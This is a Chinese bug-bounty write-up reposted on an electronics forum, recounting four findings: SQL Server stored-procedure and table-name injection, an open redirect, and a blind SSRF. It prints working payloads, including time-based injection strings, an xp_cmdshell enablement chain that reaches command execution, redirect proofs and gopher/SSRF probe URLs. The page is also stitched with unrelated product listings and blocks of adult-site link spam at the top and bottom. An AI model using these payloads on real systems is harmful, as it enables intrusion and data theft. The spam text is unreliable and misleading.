在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

四個(gè)有趣的真實(shí)漏洞挖掘案例

jf_Fo0qk3ln ? 來(lái)源:博客園 ? 2023-05-04 11:50 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

0x00 前言

好久沒(méi)寫(xiě)真實(shí)漏洞挖掘案例了,今天寫(xiě)一筆。直接發(fā)漏洞細(xì)節(jié)很生硬,大家也學(xué)不到什么,只有帶入感情,留下筆者的想法,才能產(chǎn)生共鳴,真正的幫助到別人。

四個(gè)漏洞描述順序:

存儲(chǔ)過(guò)程sql注入;
table頭注入;
通用的url跳轉(zhuǎn);
盲ssrf漏洞;

0x01 存儲(chǔ)過(guò)程sql注入

首先我先介紹我近期挖到的第一個(gè)漏洞:sql server exec存儲(chǔ)過(guò)程處 sql injection。

這是我在挖國(guó)外遇到的一個(gè)網(wǎng)站,遇到的一個(gè)真實(shí)案例,一個(gè)后臺(tái)的某個(gè)功能點(diǎn),存在存儲(chǔ)過(guò)程sql注入,使用單引號(hào)測(cè)試,發(fā)現(xiàn)他報(bào)錯(cuò)了。

ERROR:[Microsoft][ODBC SQL Server Driver][SQL Server]Procedure or function 'proc_*' expects parameter '@linked', which was not supplied.

這個(gè)報(bào)錯(cuò)很特別,和我平時(shí)看到的sql server報(bào)錯(cuò)信息不一樣,我第一時(shí)間去谷歌搜索了下這個(gè)報(bào)錯(cuò)信息,很快就找到了一篇文章。

https://stackoverflow.com/questions/19703653/stored-procedure-or-function-expects-parameter-which-is-not-supplied

stackoverflow查看網(wǎng)站報(bào)錯(cuò)信息真的很方便,很方便幫我們判斷使用了哪些技術(shù). 雖然我英語(yǔ)很差,但是谷歌瀏覽器自帶的翻譯功能就夠了,很快我就知道這是個(gè)sql server的存儲(chǔ)過(guò)程報(bào)錯(cuò)。

話說(shuō)回來(lái),不通過(guò)谷歌搜索報(bào)錯(cuò)語(yǔ)句,通過(guò)單引號(hào)報(bào)錯(cuò),其實(shí)就可能猜出來(lái)個(gè)大概。

我還是很常規(guī)的測(cè)試,因?yàn)閳?bào)錯(cuò)了,所以我企圖用最簡(jiǎn)單的方法讓其報(bào)錯(cuò)出user/database等,嘗試poc:

'and 1>user and'1'='1
'and user<0 and '1'='1

發(fā)現(xiàn)沒(méi)有出user,甚至仍然報(bào)錯(cuò),其實(shí)這是正常的。后續(xù)測(cè)試發(fā)現(xiàn),只要我在后面添加內(nèi)容,他就會(huì)一直報(bào)錯(cuò)...,他好像不允許添加過(guò)多的注入payload

4049d594-e861-11ed-ab56-dac502259ad0.png ?

我開(kāi)始從報(bào)錯(cuò)注入,轉(zhuǎn)為布爾類型注入測(cè)試:

'and iif(user like '%25',1,1) and'1'='1
?

類似這樣的payload,結(jié)局是淚目的,語(yǔ)句又是各種報(bào)錯(cuò)。我發(fā)現(xiàn)不能再這樣搞了,這樣搞的話思路肯定不對(duì)。

先從理解sql報(bào)錯(cuò)信息開(kāi)始,理解存儲(chǔ)過(guò)程,sql server的存儲(chǔ)過(guò)程的語(yǔ)法是這樣的:

exec 任意語(yǔ)句 / exec 'sql語(yǔ)句'

它本身其實(shí)不需要任何單引號(hào)的閉合,因?yàn)樗皇亲址愋妥⑷?,重新調(diào)整測(cè)試,測(cè)試就是學(xué)習(xí)的過(guò)程,再次上payload:

13 if(substring(db_name(),1,1)='*')waitfor delay'03'

一頓fuzz,延時(shí)3s:

4072f848-e861-11ed-ab56-dac502259ad0.png ?

說(shuō)明我的這個(gè)poc沒(méi)有問(wèn)題,一開(kāi)始踩了一個(gè)坑,一個(gè)認(rèn)知問(wèn)題,慣性思維導(dǎo)致的錯(cuò)誤。

mysql下的ifif(條件,結(jié)果1,結(jié)果2)
sql server下的ifif(條件) 結(jié)果 else (結(jié)果)

這里誤以為sql server的if也是和mysql的if使用一樣,其實(shí)完全不一樣,sql server等同mysql if函數(shù)的是iif函數(shù).

我們知道,sql server報(bào)錯(cuò)有個(gè)很爽的技巧就是基于類型錯(cuò)誤:int+varchar,嘗試報(bào)錯(cuò)出db_name()。

報(bào)錯(cuò)注入poc:

13 if(1=0/db_name())waitfor delay'01'
40883924-e861-11ed-ab56-dac502259ad0.png ?

至此,這個(gè)注入算搞定了,我可以提交了。

0x02 table頭注入

第二個(gè)分享的案例仍然是注入,sql server table頭注入,有意思的地方在于rce處,利用一個(gè)sql server特性我rce了它。

某天我挖一個(gè)站,發(fā)現(xiàn)一個(gè)功能點(diǎn)存在注入,是那種很常規(guī)的注入,通過(guò)查看js,我發(fā)現(xiàn)了一個(gè)接口

https://xxx.com/1.aspx?plugin=*&action=*&navigationid=1&table={注入點(diǎn)}

我看到了table參數(shù),我覺(jué)得這可能是sql server table頭注入,這是經(jīng)常做安全測(cè)試的一種直覺(jué),我直接輸入了sysobject,他給我大量返回了信息:

40a21e16-e861-11ed-ab56-dac502259ad0.png我很驚喜,那么它代碼的實(shí)現(xiàn)很大可能是:
select * from {可控點(diǎn)}

那么我可以做的事情變得很多很多,這個(gè)注入利用成本很低,我覺(jué)得他就是個(gè)任意sql語(yǔ)句執(zhí)行漏洞。

我嘗試rce,為了再次確定他是表頭注入,我嘗試在可控點(diǎn)處添加where等條件語(yǔ)句,嘗試Payload。

sysobjects where xtype='u' #查詢數(shù)據(jù)庫(kù)中的所有表名

40c2dbe2-e861-11ed-ab56-dac502259ad0.png

很幸運(yùn),沒(méi)任何報(bào)錯(cuò),直接響應(yīng)了。40f39e8a-e861-11ed-ab56-dac502259ad0.png

我開(kāi)始嘗試rce,我們都知道sql server rce的條件是需要支持堆疊,我嘗試;waitfor delay '03';直接給我報(bào)錯(cuò)了,那么大概率可能不支持堆疊查詢

不過(guò)這個(gè)注入點(diǎn)非常特別,是表頭注入,它滿足一定的條件,即使不支持堆疊,只要權(quán)限夠高,我們也可以rce。

先開(kāi)啟xp_cmdshell擴(kuò)展:

sysobjects+select+1+if+1%3d1+execute('EXEC+sp_configure+''show+advanced+options'',+1%3bRECONFIGURE%3bEXEC+sp_configure+''xp_cmdshell'',+1%3bRECONFIGURE%3b')

執(zhí)行命令:

sysobjects+select+1++if+1%3d1+execute('exec+master..xp_cmdshell+"whoami"')

直接頁(yè)面顯示了whoami信息:

41097e58-e861-11ed-ab56-dac502259ad0.png

我是幸運(yùn)的,很快,我就提交了漏洞給相關(guān)廠商。

因?yàn)槭潜眍^注入,所以不需要堆疊了,因?yàn)閟ql server的select支持 select x select x

41217080-e861-11ed-ab56-dac502259ad0.png

sql server容錯(cuò)率很強(qiáng)大,不同類型在一起不會(huì)報(bào)錯(cuò),會(huì)做自動(dòng)區(qū)分。

414f1ad0-e861-11ed-ab56-dac502259ad0.png418330ae-e861-11ed-ab56-dac502259ad0.png

第二個(gè)漏洞分享結(jié)束,開(kāi)始第三個(gè)url跳轉(zhuǎn)漏洞分享。

0x03 通用的url跳轉(zhuǎn)

其實(shí)有時(shí)候,運(yùn)氣不是總是很好,漏洞也很難挖,連續(xù)好幾天,我都沒(méi)挖到漏洞,我在那邊胡亂看著,瞎點(diǎn)著。

有一個(gè)站引起了我的興趣,他的注冊(cè)接口是這樣的。
https://*/sss/yyyy?returnUrl=https://*/#/xxxx/xxx

我對(duì)url參數(shù)比較敏感,通常我會(huì)測(cè)試ssrf/xss,即使他大概率不存在,我也會(huì)測(cè)試下,很顯然,半自動(dòng)化工具沒(méi)有發(fā)現(xiàn)任何ssrf和xss漏洞。

我注冊(cè)了一個(gè)賬號(hào),我嘗試登錄,它告訴我,我的賬號(hào)需要審核,我嘗試?yán)@過(guò),我也沒(méi)有繞過(guò)它。

我發(fā)現(xiàn)我沒(méi)發(fā)現(xiàn)漏洞了,那我就隨便看看吧,我都不抓包了,右鍵查看源代碼,發(fā)現(xiàn)了這么一段代碼,以前我就經(jīng)常做js代碼審計(jì),這段代碼我不會(huì)陌生。

if(location.hash){location="https://hostname"+location.hash.substring(1);}

稍微學(xué)過(guò)一點(diǎn)js的也不會(huì)陌生,不過(guò)我們還是要走一遍基礎(chǔ)的測(cè)試流程,它使用location.hash.*去傳遞參數(shù)。

這個(gè)就是錨點(diǎn)符,常用于站內(nèi)url跳轉(zhuǎn),記錄#/后面的內(nèi)容,其實(shí)這里的本意是做站內(nèi)url跳轉(zhuǎn)用的,不過(guò)這里沒(méi)在hostname結(jié)尾處加/這個(gè)字符串,導(dǎo)致可以任意跳轉(zhuǎn)。

我們簡(jiǎn)單測(cè)試下:

419ea8c0-e861-11ed-ab56-dac502259ad0.png

那么如果我們想任意url跳轉(zhuǎn)怎么辦???

只需要讓location.hash.substring(1)變成另一個(gè)我們的域名即可,構(gòu)造poc如下:
http://example.com/#.dnslog.cn
他會(huì)直接跳轉(zhuǎn)出信任域,實(shí)現(xiàn)任意頁(yè)面url跳轉(zhuǎn)41b673f6-e861-11ed-ab56-dac502259ad0.png

除了這樣還可以通過(guò)@domain去跳轉(zhuǎn)到第三方網(wǎng)站,更加方便?。?!

他的修復(fù)方案也很簡(jiǎn)單:

if(location.hash){location="https://hostname/"+location.hash.substring(1);}

至此第三個(gè)漏洞就分享完了。

0x04 盲ssrf漏洞

現(xiàn)在分享最后一個(gè)漏洞,就是盲的ssrf漏洞。前面我說(shuō)過(guò),我看到url參數(shù),我就會(huì)嘗試下ssrf/xss漏洞,這里我發(fā)現(xiàn)了一個(gè)圖片加載功能,存在ssrf。首先在分享ssrf實(shí)戰(zhàn)案例之前,先分享個(gè)ssrf安全測(cè)試圣經(jīng):https://github.com/cujanovic/SSRF-Testing

github上提供的測(cè)試用例:

https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg

如果想探測(cè)是否開(kāi)放gopher,又不想觸發(fā)waf怎么做?

https://ssrf.localdomain.pw/img-without-body/301-gopher-{dnslog.cn}-.i.jpg

這個(gè)url地址是可以變化的,測(cè)試什么協(xié)議就變成什么協(xié)議,其他測(cè)試樣本不再舉例,類似的,都可以隨意轉(zhuǎn)換

這里嘗試301跳轉(zhuǎn):

41d1f37e-e861-11ed-ab56-dac502259ad0.pngdnslog成功收到請(qǐng)求,注意User-Agent,是libwww,perl的一個(gè)請(qǐng)求依賴庫(kù):
GET / HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: bt8vfrpehb5ur0ldbb4o47c9s0yqmf.burpcollaborator.net
User-Agent: ImageVacuum/2.3.10 libwww-perl/6.57
使用上面的思路,測(cè)試下敏感協(xié)議,gopher協(xié)議:4221117a-e861-11ed-ab56-dac502259ad0.png

有反應(yīng),說(shuō)明大概率是支持gopher協(xié)議的,那么它到底支持不支持呢?

通過(guò)查看github libwww代碼,就可以得到答案,他支持這些協(xié)議,其中包含gopher協(xié)議。

42357a66-e861-11ed-ab56-dac502259ad0.png

這樣我們就可以使用gopher協(xié)議去批量fuzz探測(cè)內(nèi)網(wǎng)redis等服務(wù),這個(gè)點(diǎn)到此為止。

下面繼續(xù)科普下盲的ssrf怎么探測(cè)?因?yàn)橐话?span style="font-size:15px;">信息收集不全的情況下,我們沒(méi)什么內(nèi)網(wǎng)ip地址,那么我們?cè)趺醋C明是盲ssrf呢?

本地ip:存在端口 vs 本地ip:大概率不存在的端口

25端口提示我圖片類型不對(duì):

42705906-e861-11ed-ab56-dac502259ad0.png250端口,提示我連接被拒絕428635be-e861-11ed-ab56-dac502259ad0.png這樣就可以證明這是個(gè)盲的ssrf,它可以探測(cè)內(nèi)網(wǎng)端口開(kāi)放情況,然后因?yàn)樗种С謌opher等敏感協(xié)議,它可以fuzz內(nèi)網(wǎng)redis,嘗試shell等,危害將會(huì)大大升級(jí)。 至此,已經(jīng)分享完了四個(gè)漏洞,通過(guò)我的所思所想,希望能給大家?guī)?lái)一些感悟,我該去做飯吃了。
審核編輯 :李倩

聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 存儲(chǔ)
    +關(guān)注

    關(guān)注

    13

    文章

    4528

    瀏覽量

    87368
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    783

    瀏覽量

    45060
  • 漏洞
    +關(guān)注

    關(guān)注

    0

    文章

    205

    瀏覽量

    15684

原文標(biāo)題:四個(gè)有趣的真實(shí)漏洞挖掘案例

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    用于 GSM/ GPRS (824-915 MHz) (1710-1910 MHz) 的 Tx-Rx 頻前端模塊,帶四個(gè)線性 TRx 開(kāi)關(guān)端口 skyworksinc

    電子發(fā)燒友網(wǎng)為你提供()用于 GSM/ GPRS (824-915 MHz) (1710-1910 MHz) 的 Tx-Rx 頻前端模塊,帶四個(gè)線性 TRx 開(kāi)關(guān)端口相關(guān)產(chǎn)品參數(shù)、數(shù)據(jù)手冊(cè),更有
    發(fā)表于 05-28 18:33
    用于 GSM/ GPRS (824-915 MHz) (1710-1910 MHz) 的 Tx-Rx <b class='flag-5'>四</b>頻前端模塊,帶<b class='flag-5'>四個(gè)</b>線性 TRx 開(kāi)關(guān)端口 skyworksinc

    用于 GSM/GPRS (824-915 MHz) (1710-1910 MHz) 的 Tx-Rx 頻前端模塊,帶四個(gè)線性 TRx 開(kāi)關(guān)端口 skyworksinc

    電子發(fā)燒友網(wǎng)為你提供()用于 GSM/GPRS (824-915 MHz) (1710-1910 MHz) 的 Tx-Rx 頻前端模塊,帶四個(gè)線性 TRx 開(kāi)關(guān)端口相關(guān)產(chǎn)品參數(shù)、數(shù)據(jù)手冊(cè),更有
    發(fā)表于 05-28 18:33
    用于 GSM/GPRS (824-915 MHz) (1710-1910 MHz) 的 Tx-Rx <b class='flag-5'>四</b>頻前端模塊,帶<b class='flag-5'>四個(gè)</b>線性 TRx 開(kāi)關(guān)端口 skyworksinc

    用于頻 GSM / GPRS / EDGE 的 Tx-Rx FEM,具有四個(gè)線性 TRx 開(kāi)關(guān)端口和雙頻 TD-SCDMA skyworksinc

    電子發(fā)燒友網(wǎng)為你提供()用于頻 GSM / GPRS / EDGE 的 Tx-Rx FEM,具有四個(gè)線性 TRx 開(kāi)關(guān)端口和雙頻 TD-SCDMA相關(guān)產(chǎn)品參數(shù)、數(shù)據(jù)手冊(cè),更有用于頻 GSM
    發(fā)表于 05-28 18:31
    用于<b class='flag-5'>四</b>頻 GSM / GPRS / EDGE 的 Tx-Rx FEM,具有<b class='flag-5'>四個(gè)</b>線性 TRx 開(kāi)關(guān)端口和雙頻 TD-SCDMA skyworksinc

    PLC產(chǎn)品故障問(wèn)題測(cè)試的四個(gè)部分

    ,必須對(duì)故障問(wèn)題進(jìn)行系統(tǒng)化測(cè)試。本文將詳細(xì)介紹PLC產(chǎn)品故障問(wèn)題測(cè)試的四個(gè)關(guān)鍵部分,幫助技術(shù)人員快速定位和解決問(wèn)題。 一、硬件測(cè)試 硬件測(cè)試是PLC故障診斷的首要環(huán)節(jié),主要針對(duì)PLC設(shè)備的物理部件進(jìn)行檢查。首先,需要檢查電源模塊是否
    的頭像 發(fā)表于 05-11 17:00 ?327次閱讀
    PLC產(chǎn)品故障問(wèn)題測(cè)試的<b class='flag-5'>四個(gè)</b>部分

    ADS1211獲取四個(gè)通道全部數(shù)據(jù)的最短時(shí)間是多少?

    看pdf沒(méi)看出什么門道,想問(wèn)下這款A(yù)DC四個(gè)差分通道同步采樣,獲取四個(gè)通道全部數(shù)據(jù)的最短時(shí)間是多少!
    發(fā)表于 02-10 07:24

    模數(shù)轉(zhuǎn)換電路的四個(gè)過(guò)程

    模數(shù)轉(zhuǎn)換(Analog-to-Digital Conversion,簡(jiǎn)稱ADC)是將模擬信號(hào)轉(zhuǎn)換為數(shù)字信號(hào)的關(guān)鍵過(guò)程,廣泛應(yīng)用于通信、數(shù)據(jù)采集、信號(hào)處理等領(lǐng)域。模數(shù)轉(zhuǎn)換電路的設(shè)計(jì)與實(shí)現(xiàn)涉及多個(gè)關(guān)鍵步驟,通??梢苑譃?b class='flag-5'>四個(gè)主要過(guò)程:采樣、保持、量化和編碼。本文將詳細(xì)分析這四個(gè)
    的頭像 發(fā)表于 02-03 16:12 ?1452次閱讀

    請(qǐng)問(wèn)DAC3484四個(gè)通道能否獨(dú)立使用?

    請(qǐng)問(wèn),DAC3484 四個(gè)通道能否獨(dú)立使用?即當(dāng)把DAC的NCO頻率設(shè)置為fs/2時(shí),IQ兩個(gè)通道是否就可以獨(dú)立了?
    發(fā)表于 01-23 07:35

    請(qǐng)問(wèn)AD9852四個(gè)輸出口有什么差別?

    AD9852四個(gè)輸出口有什么差別?是不是IOUT1是余弦輸出,IOUT2是DAC控制輸出,需要設(shè)置DAC控制寄存器?
    發(fā)表于 01-16 06:59

    ADS1158 MUXOUT、MUXOUTP、ADCINP和ADCINN這四個(gè)管腳什么作用呢?

    ADS1158 MUXOUT、MUXOUTP、ADCINP和ADCINN這四個(gè)管腳什么作用呢,如果我用單端5V供電,2.5V基準(zhǔn)源,是否要按照datasheet里那種用運(yùn)放的接法嗎?
    發(fā)表于 01-01 06:39

    智譜推出四個(gè)全新端側(cè)模型 攜英特爾按下AI普及加速鍵

    隨著AI的發(fā)展,端側(cè)AI模型越來(lái)越受到廣大客戶及廠商的關(guān)注,業(yè)界領(lǐng)先的大模型公司智譜于近日推出了四個(gè)全新的端側(cè)模型,加速AI前沿技術(shù)路徑與創(chuàng)新應(yīng)用場(chǎng)景探索,推動(dòng)AI大模型普惠化發(fā)展。 四個(gè)模型中
    的頭像 發(fā)表于 12-02 17:13 ?584次閱讀
    智譜推出<b class='flag-5'>四個(gè)</b>全新端側(cè)模型 攜英特爾按下AI普及加速鍵

    請(qǐng)問(wèn)DAC3484的四個(gè)通道可以獨(dú)立使用嗎?如何實(shí)現(xiàn)?

    請(qǐng)問(wèn)DAC3484的四個(gè)通道可以獨(dú)立使用嗎?如何實(shí)現(xiàn)?謝謝
    發(fā)表于 11-22 07:14

    實(shí)現(xiàn)2.5A驅(qū)動(dòng)電流并提供四個(gè)可獨(dú)立控制的1/2H橋驅(qū)動(dòng)芯片-SS8844T

    SS8844T是一款通道1/2H橋驅(qū)動(dòng)芯片,提供四個(gè)可獨(dú)立控制的1/2H橋啟動(dòng)器;可被用于驅(qū)動(dòng)兩個(gè)DC電機(jī)、一個(gè)步進(jìn)電機(jī)、四個(gè)螺線管或者其
    的頭像 發(fā)表于 10-23 09:32 ?678次閱讀
    實(shí)現(xiàn)2.5A驅(qū)動(dòng)電流并提供<b class='flag-5'>四個(gè)</b>可獨(dú)立控制的1/2H橋驅(qū)動(dòng)芯片-SS8844T

    請(qǐng)問(wèn)PCM1863支持四個(gè)差分MIC同時(shí)輸入嗎?

    PCM1863支持四個(gè)差分MIC同時(shí)輸入嗎?
    發(fā)表于 10-21 08:01

    構(gòu)成電路的必要元件有哪四個(gè)

    構(gòu)成電路的必要元件主要有四個(gè),它們分別是: 電源 :電源是電路中提供電能的設(shè)備。它的作用是將其他形式的能量(如化學(xué)能、機(jī)械能等)轉(zhuǎn)換為電能,從而為電路中的其他元件提供所需的電壓和電流。沒(méi)有電源,電路
    的頭像 發(fā)表于 08-25 09:45 ?1875次閱讀

    IGBT的四個(gè)主要參數(shù)

    IGBT的四個(gè)主要參數(shù)對(duì)于選擇合適的IGBT器件至關(guān)重要。本文將介紹IGBT的四個(gè)主要參數(shù):電壓等級(jí)、電流等級(jí)、開(kāi)關(guān)頻率和熱性能。 1. 電壓等級(jí) 電壓等級(jí)是IGBT的一個(gè)重要參數(shù),它決定了IGBT能夠承受的最大電壓。電壓等級(jí)的
    的頭像 發(fā)表于 07-25 11:05 ?7573次閱讀
    主站蜘蛛池模板: 国产特级毛片 | 国产精品青草久久 | 色偷偷综合 | 欧亚色视频 | 亚洲91| 亚洲精品蜜桃久久久久久 | 午夜视频网站 | 国产香蕉一区二区精品视频 | 欧美成人午夜视频 | 亚洲三级免费观看 | 啪啪免费看视频 | 诱人的老师bd高清日本在线观看 | 男人的天堂午夜 | 成人在线视频网 | 免费四虎永久在线精品 | 永久在线观看www免费视频 | free 欧美| 热久久久久久 | 亚洲天堂电影在线观看 | h视频日本 | 久久夜夜操妹子 | 日本在线观看永久免费网站 | 国产精品午夜寂寞视频 | 亚洲第一成年网 | 国产精品欧美久久久久天天影视 | 美女视频永久黄网站在线观看 | 无遮挡很污很爽很黄的网站 | 亚洲一区二区欧美 | 国产成在线人视频免费视频 | 欧美午夜色大片在线观看免费 | 天天操天天干天天干 | 天天综合色天天综合 | 亚洲欧美一区二区三区在线播放 | 一区二区三区精品视频 | 久久精品国产精品亚洲婷婷 | 乱人伦的小说 | 曰本性l交片视频视频 | 午夜不卡影院 | 成人av在线电影 | 国产好深好硬好爽我还要视频 | 能可以直接看的av网址 |